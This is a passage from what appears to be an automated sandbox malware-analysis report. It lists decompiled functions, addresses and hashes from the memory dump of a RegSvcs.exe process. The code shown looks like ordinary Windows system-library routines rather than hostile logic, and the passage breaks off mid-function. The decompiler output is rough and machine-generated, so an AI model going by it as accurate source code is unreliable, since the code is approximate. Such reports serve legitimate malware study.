                                          0x013c10da
                                          0x013c10e9
                                          0x013c10f5
                                          0x013c10f5
                                          0x013c10fe

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1465e4dc0accea78dc8136b3703237b9bea8349647562b785796b5e04536192d
                                          • Instruction ID: 348a1a5f9c94d6a37d34aeaa8a7d4ba78b01bb212f4d7bde9cc21739752fe647
                                          • Opcode Fuzzy Hash: 1465e4dc0accea78dc8136b3703237b9bea8349647562b785796b5e04536192d
                                          • Instruction Fuzzy Hash: DF014772604746DFC720EF2CC944B1A7BE9AF84718F04862DF98583692EE30DC44DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013AFE3F Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E013AFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x13ed360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0133FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01317D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0133B640(E01339AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x013afe3f
                                          0x013afe3f
                                          0x013afe4e
                                          0x013afe58
                                          0x013afe5d
                                          0x013afe5f
                                          0x013afe6a
                                          0x013afe72
                                          0x013afe75
                                          0x013afe78
                                          0x013afe83
                                          0x013afe95
                                          0x013afe85
                                          0x013afe8e
                                          0x013afe8e
                                          0x013afea0
                                          0x013afea1
                                          0x013afea3
                                          0x013afea8
                                          0x013afebd

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff194c79b2a3dc716edbd2599f422719dafaec36dbaf8cca7ff6d872b5a98632
                                          • Instruction ID: 03ce01592b18b093bd394ae43bee32b7099f964092f3af942f51964faabd3dc9
                                          • Opcode Fuzzy Hash: ff194c79b2a3dc716edbd2599f422719dafaec36dbaf8cca7ff6d872b5a98632
                                          • Instruction Fuzzy Hash: AB018471E0020DAFDB14DFA9D845FAEBBBCEF84714F404066B904AB291DA709901C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013AFEC0 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E013AFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x13ed360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0133FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01317D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0133B640(E01339AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x013afec0
                                          0x013afec0
                                          0x013afecf
                                          0x013afed9
                                          0x013afede
                                          0x013afee0
                                          0x013afeeb
                                          0x013afef3
                                          0x013afef6
                                          0x013afef9
                                          0x013aff04
                                          0x013aff16
                                          0x013aff06
                                          0x013aff0f
                                          0x013aff0f
                                          0x013aff21
                                          0x013aff22
                                          0x013aff24
                                          0x013aff29
                                          0x013aff3e

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 05079080023b2de91f4638a3d1066527234c7568ce083d1545005fef3e7fd580
                                          • Instruction ID: 9bdd51a4cfa72134bd11e44650155d2bde28b334971a3a69dcf265730e1577ff
                                          • Opcode Fuzzy Hash: 05079080023b2de91f4638a3d1066527234c7568ce083d1545005fef3e7fd580
                                          • Instruction Fuzzy Hash: 2A018871E0020DAFDB14DBA9D845FAEB7BCEF44714F404066BA009B290DA709901C799
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C8A62 Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E013C8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x13ed360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01317D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0133B640(E01339AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x013c8a62
                                          0x013c8a71
                                          0x013c8a79
                                          0x013c8a82
                                          0x013c8a85
                                          0x013c8a89
                                          0x013c8a8c
                                          0x013c8a8f
                                          0x013c8a92
                                          0x013c8a95
                                          0x013c8a9f
                                          0x013c8ab1
                                          0x013c8aa1
                                          0x013c8aaa
                                          0x013c8aaa
                                          0x013c8abc
                                          0x013c8abd
                                          0x013c8abf
                                          0x013c8ac4
                                          0x013c8ada

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f8de99708bb258e92602a1b69ebc1a118cadbc5fb360dd2cc366a77d7eb867b
                                          • Instruction ID: 0905550af8a7716b28141559c2f9c63e874050d7aeeb646efafd12d62b53e68f
                                          • Opcode Fuzzy Hash: 9f8de99708bb258e92602a1b69ebc1a118cadbc5fb360dd2cc366a77d7eb867b
                                          • Instruction Fuzzy Hash: 4E012C75A0021DAFDB04DFADD9419AEBBB8EF58714F10405AF904E7351DA34AE01CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C8ED6 Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E013C8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x13ed360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01317D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0133B640(E01339AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                          0x013c8ed6
                                          0x013c8ee5
                                          0x013c8eed
                                          0x013c8ef0
                                          0x013c8efa
                                          0x013c8f03
                                          0x013c8f0c
                                          0x013c8f15
                                          0x013c8f24
                                          0x013c8f27
                                          0x013c8f31
                                          0x013c8f43
                                          0x013c8f33
                                          0x013c8f3c
                                          0x013c8f3c
                                          0x013c8f4e
                                          0x013c8f4f
                                          0x013c8f51
                                          0x013c8f56
                                          0x013c8f69

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78385c952e30c453955c9b722dbe445e3669be69fef79cf358b11e66d0956b43
                                          • Instruction ID: ff3b23ba45197144ced607f2d73e83758e933a6a3af615782c99ef26c6b01ac9
                                          • Opcode Fuzzy Hash: 78385c952e30c453955c9b722dbe445e3669be69fef79cf358b11e66d0956b43
                                          • Instruction Fuzzy Hash: 49110070D0421A9FDB04DFA8D441BADB7F4BB48704F0442AAE518EB781D6349940CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FDB60 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E012FDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E012FDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E012FE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L012FE8B0(__ecx, _t14, 0xfff);
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                          0x012fdb64
                                          0x012fdb66
                                          0x012fdb6b
                                          0x012fdbaa
                                          0x012fdb71
                                          0x012fdb76
                                          0x012fdb7a
                                          0x012fdba3
                                          0x012fdb7c
                                          0x012fdb87
                                          0x012fdb8b
                                          0x01354fa1
                                          0x01354fb3
                                          0x01354fb8
                                          0x012fdb91
                                          0x012fdb96
                                          0x012fdb98
                                          0x012fdb98
                                          0x012fdb8b
                                          0x012fdb7a
                                          0x012fdb9d
                                          0x012fdba2

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction ID: 09bb1bb154de2bfddb274947b71212c6f5a55fb12be66e141e7c93c12c86c574
                                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction Fuzzy Hash: CDF0C83322152F9BD3326ED9C894F27F6958F91A60F16003DB7059B244D960880296D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FB1E1 Relevance: .0, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E012FB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01317D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01317D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01377016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                          0x012fb1e8
                                          0x012fb1ea
                                          0x012fb1f3
                                          0x01354a17
                                          0x012fb1f9
                                          0x012fb1f9
                                          0x012fb1f9
                                          0x012fb201
                                          0x01354a21
                                          0x01354a2e
                                          0x00000000
                                          0x00000000
                                          0x01354a3b
                                          0x01354a4d
                                          0x01354a3d
                                          0x01354a46
                                          0x01354a46
                                          0x01354a55
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012fb20a
                                          0x012fb20a
                                          0x012fb20a
                                          0x012fb20a

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction ID: 2725dfe015040909f3ef17e29f4092f1ec76c67079d0ef5e498066c400120a3f
                                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction Fuzzy Hash: 3A01F9362105849BE326975DC804F5ABB98EF51B98F080075FF148B6B2E678C840C314
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0138FE87 Relevance: .0, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E0138FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x13ed360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01317D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0133B640(E01339AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                          0x0138fe96
                                          0x0138fe9e
                                          0x0138fea1
                                          0x0138fead
                                          0x0138feb3
                                          0x0138feb9
                                          0x0138fec3
                                          0x0138fed5
                                          0x0138fec5
                                          0x0138fece
                                          0x0138fece
                                          0x0138fee0
                                          0x0138fee1
                                          0x0138fee3
                                          0x0138fee8
                                          0x0138fefb

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eeb55c1a5195dd0ef594034de93afe2552091f626b6aabfe6d9a27ba3d735a1e
                                          • Instruction ID: 20c83df4feebe1b2e6f0b6741d2b2de795d760c0df0bef7abdc9e3121734e393
                                          • Opcode Fuzzy Hash: eeb55c1a5195dd0ef594034de93afe2552091f626b6aabfe6d9a27ba3d735a1e
                                          • Instruction Fuzzy Hash: 1A016270A0030DEFCB14EFACD541A6EB7F4EF04704F144159A518DB382D635E901CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B131B Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E013B131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x13ed360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01317D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0133B640(E01339AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                          0x013b131b
                                          0x013b132a
                                          0x013b1330
                                          0x013b1336
                                          0x013b133e
                                          0x013b1341
                                          0x013b1344
                                          0x013b134f
                                          0x013b1361
                                          0x013b1351
                                          0x013b135a
                                          0x013b135a
                                          0x013b136c
                                          0x013b136d
                                          0x013b136f
                                          0x013b1374
                                          0x013b1387

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4b3c4bf17b3792014e08903f13656aa7b90b4390bb4ca269e8c3e8df55526bc3
                                          • Instruction ID: 2d2c5d8548983bec9007fa3008470a9b0c5fc5d58b2b33bddccb23796418b842
                                          • Opcode Fuzzy Hash: 4b3c4bf17b3792014e08903f13656aa7b90b4390bb4ca269e8c3e8df55526bc3
                                          • Instruction Fuzzy Hash: 32018C71E0120CEFCB44EFA8D545AAEB7F4FF48304F004059B905EB381E6309A00CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C8F6A Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E013C8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x13ed360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01317D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0133B640(E01339AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                          0x013c8f6a
                                          0x013c8f79
                                          0x013c8f81
                                          0x013c8f84
                                          0x013c8f8b
                                          0x013c8f91
                                          0x013c8f94
                                          0x013c8f9e
                                          0x013c8fb0
                                          0x013c8fa0
                                          0x013c8fa9
                                          0x013c8fa9
                                          0x013c8fbb
                                          0x013c8fbc
                                          0x013c8fbe
                                          0x013c8fc3
                                          0x013c8fd6

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c0e3dc943eb48330c216f261d9e1f18ee79c1e190cd3de6fa4b8d3402f20bee
                                          • Instruction ID: 011cc43417515bb9cedc51200f606228258ed97c85a077e087074648268317e7
                                          • Opcode Fuzzy Hash: 6c0e3dc943eb48330c216f261d9e1f18ee79c1e190cd3de6fa4b8d3402f20bee
                                          • Instruction Fuzzy Hash: 95013C74A0020DAFDB04EFACD545AAEB7F4EF58704F504099F905EB381EA74DA00DB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B1608 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E013B1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x13ed360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01317D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0133B640(E01339AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                          0x013b1608
                                          0x013b1617
                                          0x013b161d
                                          0x013b1625
                                          0x013b1628
                                          0x013b162b
                                          0x013b1636
                                          0x013b1648
                                          0x013b1638
                                          0x013b1641
                                          0x013b1641
                                          0x013b1653
                                          0x013b1654
                                          0x013b1656
                                          0x013b165b
                                          0x013b166e

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78fd23fb4213e0c89fc100b1f533cf432a778f60c43355c7bf2a40be7c658056
                                          • Instruction ID: 3c25c9fce7106335d37e2e6c445517480bf3d2d9f76c256ddfd1e39f3afb3580
                                          • Opcode Fuzzy Hash: 78fd23fb4213e0c89fc100b1f533cf432a778f60c43355c7bf2a40be7c658056
                                          • Instruction Fuzzy Hash: 05F06D71E0024CEFDB14EFA8D445AAEBBF8EF58304F444069AA15EB391EA349900DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131C577 Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0131C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0131C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x12d11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E013C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                          0x0131c577
                                          0x0131c57d
                                          0x0131c581
                                          0x0131c5b5
                                          0x0131c5b9
                                          0x0131c5ce
                                          0x0131c5ce
                                          0x0131c5ca
                                          0x00000000
                                          0x0131c5ca
                                          0x0131c5c4
                                          0x0131c5c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131c5ad
                                          0x00000000
                                          0x0131c5af

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23ae4baec0965b444205bcc2ac518fdda6017b344f69d0aba5f1a678d30c218d
                                          • Instruction ID: 4d14b49665c73c519e02c445bf966f5229b4b25f7f24641a1a1639b058e54a76
                                          • Opcode Fuzzy Hash: 23ae4baec0965b444205bcc2ac518fdda6017b344f69d0aba5f1a678d30c218d
                                          • Instruction Fuzzy Hash: CDF024B2891294CFE73EC32EC004B227FD99B0463CF446467D4058350AC2A0CC80C244
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B2073 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E013B2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E013AFD22(__ecx);
				_t19 =  *0x13e849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x13e8748; // 0x0
					if(__eflags <= 0) {
						E013B1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x13e8724 & 0x00000004;
							if(( *0x13e8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
